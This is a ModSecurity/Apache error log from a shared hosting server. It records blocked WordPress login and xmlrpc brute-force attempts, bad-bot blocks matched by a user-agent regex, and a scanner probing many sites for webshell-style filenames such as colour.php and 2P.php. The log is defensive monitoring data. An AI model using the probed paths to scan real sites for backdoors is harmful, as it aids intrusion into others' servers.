[Tue May 26 17:28:47.955203 2026] [security2:error] [pid 891273:tid 891351] [remote 94.76.235.103:47868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWK98DEzZ8z3jtDm82SCwAAB00"]
[Tue May 26 17:28:48.505184 2026] [security2:error] [pid 891273:tid 891525] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK-MDEzZ8z3jtDm82SEwAAAHo"]
[Tue May 26 17:28:48.801171 2026] [security2:error] [pid 891273:tid 891488] [client 20.12.194.227:37780] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/post-comments-form/"] [unique_id "ahWK-MDEzZ8z3jtDm82SIgAAAFU"]
[Tue May 26 17:28:49.500686 2026] [security2:error] [pid 891273:tid 891499] [client 20.12.194.227:13722] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWK-cDEzZ8z3jtDm82SMwAAAGA"]
[Tue May 26 17:28:49.583612 2026] [security2:error] [pid 891273:tid 891444] [client 20.12.194.227:37780] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/wp-admin/js/"] [unique_id "ahWK-cDEzZ8z3jtDm82SNAAAACk"]
[Tue May 26 17:28:49.651131 2026] [security2:error] [pid 891273:tid 891418] [client 20.12.194.227:13722] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWK-cDEzZ8z3jtDm82SNQAAAA8"]
[Tue May 26 17:28:49.733974 2026] [security2:error] [pid 891273:tid 891404] [client 20.12.194.227:37780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWK-cDEzZ8z3jtDm82SPAAAAAE"]
[Tue May 26 17:28:49.734114 2026] [security2:error] [pid 891273:tid 891404] [client 20.12.194.227:37780] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWK-cDEzZ8z3jtDm82SPAAAAAE"]
[Tue May 26 17:28:50.138334 2026] [security2:error] [pid 891273:tid 891433] [client 223.235.98.214:17577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWK-sDEzZ8z3jtDm82SWQAAAB4"]
[Tue May 26 17:28:50.138439 2026] [security2:error] [pid 891273:tid 891433] [client 223.235.98.214:17577] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWK-sDEzZ8z3jtDm82SWQAAAB4"]
[Tue May 26 17:28:50.470212 2026] [security2:error] [pid 891273:tid 891465] [client 20.12.194.227:62506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahWK-sDEzZ8z3jtDm82SbwAAAD4"]
[Tue May 26 17:28:50.470315 2026] [security2:error] [pid 891273:tid 891465] [client 20.12.194.227:62506] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahWK-sDEzZ8z3jtDm82SbwAAAD4"]
[Tue May 26 17:28:50.522457 2026] [security2:error] [pid 891273:tid 891528] [client 203.194.101.7:63234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWK-sDEzZ8z3jtDm82SeAAAAH0"]
[Tue May 26 17:28:50.522587 2026] [security2:error] [pid 891273:tid 891528] [client 203.194.101.7:63234] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWK-sDEzZ8z3jtDm82SeAAAAH0"]
[Tue May 26 17:28:51.040403 2026] [security2:error] [pid 891273:tid 891421] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK-sDEzZ8z3jtDm82SfAAAABI"]
[Tue May 26 17:28:52.060434 2026] [security2:error] [pid 891273:tid 891452] [client 20.12.194.227:61509] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahWK_MDEzZ8z3jtDm82SyQAAADE"]
[Tue May 26 17:28:52.060523 2026] [security2:error] [pid 891273:tid 891452] [client 20.12.194.227:61509] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahWK_MDEzZ8z3jtDm82SyQAAADE"]
[Tue May 26 17:28:52.642054 2026] [security2:error] [pid 891273:tid 891404] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK_MDEzZ8z3jtDm82S0gAAAAE"]
[Tue May 26 17:28:53.112478 2026] [security2:error] [pid 891273:tid 891477] [client 193.37.33.145:35357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWK_MDEzZ8z3jtDm82TAQAAAEo"]
[Tue May 26 17:28:55.348052 2026] [security2:error] [pid 891273:tid 891445] [client 121.229.156.111:47816] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.siliconelevators.in"] [uri "/robots.txt"] [unique_id "ahWK_8DEzZ8z3jtDm82TfwAAACo"]
[Tue May 26 17:28:55.348168 2026] [security2:error] [pid 891273:tid 891445] [client 121.229.156.111:47816] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.siliconelevators.in"] [uri "/robots.txt"] [unique_id "ahWK_8DEzZ8z3jtDm82TfwAAACo"]
[Tue May 26 17:28:55.482548 2026] [security2:error] [pid 891273:tid 891312] [remote 14.161.17.36:57458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWK_8DEzZ8z3jtDm82TegAAKCY"]
[Tue May 26 17:28:55.609482 2026] [security2:error] [pid 891273:tid 891324] [remote 49.12.3.147:34582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWK_8DEzZ8z3jtDm82TggAAHjI"]
[Tue May 26 17:28:55.731653 2026] [security2:error] [pid 891273:tid 891410] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK_8DEzZ8z3jtDm82TeQAAAAc"]
[Tue May 26 17:28:56.495540 2026] [security2:error] [pid 891273:tid 891425] [client 20.12.194.227:26028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWLAMDEzZ8z3jtDm82TugAAABY"]
[Tue May 26 17:28:56.495648 2026] [security2:error] [pid 891273:tid 891425] [client 20.12.194.227:26028] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWLAMDEzZ8z3jtDm82TugAAABY"]
[Tue May 26 17:28:57.038616 2026] [autoindex:error] [pid 891273:tid 891407] [client 207.241.173.18:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:28:57.346665 2026] [security2:error] [pid 891273:tid 891499] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLAMDEzZ8z3jtDm82TzwAAAGA"]
[Tue May 26 17:28:58.997346 2026] [security2:error] [pid 891273:tid 891351] [remote 178.156.182.155:34972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWLAsDEzZ8z3jtDm82UBAAAQU0"]
[Tue May 26 17:28:59.271118 2026] [security2:error] [pid 891273:tid 891448] [client 20.12.194.227:58895] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/wordpress/wp-admin/maint/"] [unique_id "ahWLA8DEzZ8z3jtDm82UEwAAAC0"]
[Tue May 26 17:28:59.549439 2026] [security2:error] [pid 891273:tid 891404] [client 49.13.167.123:64612] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWLA8DEzZ8z3jtDm82UCQAAAAE"], referer: http://ucdc.co.in/
[Tue May 26 17:29:00.187355 2026] [security2:error] [pid 891273:tid 891426] [client 20.12.194.227:62509] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWLBMDEzZ8z3jtDm82UJwAAABc"]
[Tue May 26 17:29:00.280749 2026] [security2:error] [pid 891273:tid 891356] [remote 54.36.102.244:57464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWLBMDEzZ8z3jtDm82UJgAANVI"]
[Tue May 26 17:29:00.388920 2026] [security2:error] [pid 891273:tid 891411] [client 20.12.194.227:58895] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahWLBMDEzZ8z3jtDm82UKwAAAAg"]
[Tue May 26 17:29:00.389057 2026] [security2:error] [pid 891273:tid 891411] [client 20.12.194.227:58895] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahWLBMDEzZ8z3jtDm82UKwAAAAg"]
[Tue May 26 17:29:00.426062 2026] [security2:error] [pid 891273:tid 891501] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLA8DEzZ8z3jtDm82UJQAAAGI"]
[Tue May 26 17:29:00.738430 2026] [security2:error] [pid 891273:tid 891461] [client 203.194.101.7:63561] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLBMDEzZ8z3jtDm82UMgAAADo"]
[Tue May 26 17:29:00.738561 2026] [security2:error] [pid 891273:tid 891461] [client 203.194.101.7:63561] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLBMDEzZ8z3jtDm82UMgAAADo"]
[Tue May 26 17:29:00.791730 2026] [security2:error] [pid 891273:tid 891423] [client 223.235.98.214:11545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLBMDEzZ8z3jtDm82UNgAAABQ"]
[Tue May 26 17:29:00.791858 2026] [security2:error] [pid 891273:tid 891423] [client 223.235.98.214:11545] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLBMDEzZ8z3jtDm82UNgAAABQ"]
[Tue May 26 17:29:01.642045 2026] [security2:error] [pid 891273:tid 891448] [client 87.106.152.203:53904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.onesoft.in"] [uri "/images/images/cache.php"] [unique_id "ahWLBcDEzZ8z3jtDm82UQwAAAC0"], referer: www.google.com
[Tue May 26 17:29:02.545967 2026] [security2:error] [pid 891273:tid 891411] [client 20.12.194.227:61504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahWLBsDEzZ8z3jtDm82UYwAAAAg"]
[Tue May 26 17:29:02.546112 2026] [security2:error] [pid 891273:tid 891411] [client 20.12.194.227:61504] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahWLBsDEzZ8z3jtDm82UYwAAAAg"]
[Tue May 26 17:29:02.714573 2026] [security2:error] [pid 891273:tid 891412] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLBsDEzZ8z3jtDm82UUwAAAAk"]
[Tue May 26 17:29:03.413670 2026] [security2:error] [pid 891273:tid 891360] [remote 5.45.96.74:36424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.96.45.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWLB8DEzZ8z3jtDm82UeQAATFY"]
[Tue May 26 17:29:03.612097 2026] [security2:error] [pid 891273:tid 891475] [client 20.12.194.227:58905] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWLB8DEzZ8z3jtDm82UjAAAAEg"]
[Tue May 26 17:29:03.612223 2026] [security2:error] [pid 891273:tid 891475] [client 20.12.194.227:58905] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWLB8DEzZ8z3jtDm82UjAAAAEg"]
[Tue May 26 17:29:04.299326 2026] [security2:error] [pid 891273:tid 891524] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLB8DEzZ8z3jtDm82UkgAAAHk"]
[Tue May 26 17:29:05.231587 2026] [security2:error] [pid 891273:tid 891460] [client 113.189.222.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLCMDEzZ8z3jtDm82UpAAAADk"]
[Tue May 26 17:29:07.407499 2026] [security2:error] [pid 891273:tid 891439] [client 74.7.244.7:52494] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "landsonlogistics.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWLC8DEzZ8z3jtDm82U1gAAJGM"]
[Tue May 26 17:29:07.838532 2026] [security2:error] [pid 891273:tid 891413] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLC8DEzZ8z3jtDm82U2QAAAAo"]
[Tue May 26 17:29:09.354563 2026] [core:crit] [pid 891273:tid 891465] (13)Permission denied: [client 157.55.39.194:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:29:09.693789 2026] [security2:error] [pid 891273:tid 891486] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLDcDEzZ8z3jtDm82VAwAAAFM"]
[Tue May 26 17:29:10.576107 2026] [security2:error] [pid 891273:tid 891470] [client 153.75.250.143:6732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 143.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.tedxnutm.org.ng.thedebateafrica.org"] [uri "/wp-content/themes/bootstrap-ultimate/docs/thanks.php"] [unique_id "ahWLDsDEzZ8z3jtDm82VIQAAAEM"]
[Tue May 26 17:29:10.871124 2026] [core:crit] [pid 891273:tid 891515] (13)Permission denied: [client 157.55.39.194:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:29:11.067116 2026] [autoindex:error] [pid 891273:tid 891458] [client 142.248.80.63:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:29:11.154519 2026] [security2:error] [pid 891273:tid 891517] [client 203.194.101.7:63891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLD8DEzZ8z3jtDm82VLgAAAHI"]
[Tue May 26 17:29:11.154647 2026] [security2:error] [pid 891273:tid 891517] [client 203.194.101.7:63891] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLD8DEzZ8z3jtDm82VLgAAAHI"]
[Tue May 26 17:29:11.269323 2026] [security2:error] [pid 891273:tid 891426] [client 223.235.98.214:25592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLD8DEzZ8z3jtDm82VNwAAABc"]
[Tue May 26 17:29:11.269503 2026] [security2:error] [pid 891273:tid 891426] [client 223.235.98.214:25592] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLD8DEzZ8z3jtDm82VNwAAABc"]
[Tue May 26 17:29:11.565752 2026] [security2:error] [pid 891273:tid 891459] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLD8DEzZ8z3jtDm82VNQAAADg"]
[Tue May 26 17:29:12.247887 2026] [core:crit] [pid 891273:tid 891508] (13)Permission denied: [client 157.55.39.194:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:29:12.497822 2026] [security2:error] [pid 891273:tid 891414] [client 20.151.111.128:5786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-plain.php"] [unique_id "ahWLEMDEzZ8z3jtDm82VYQAAAAs"], referer: www.google.com
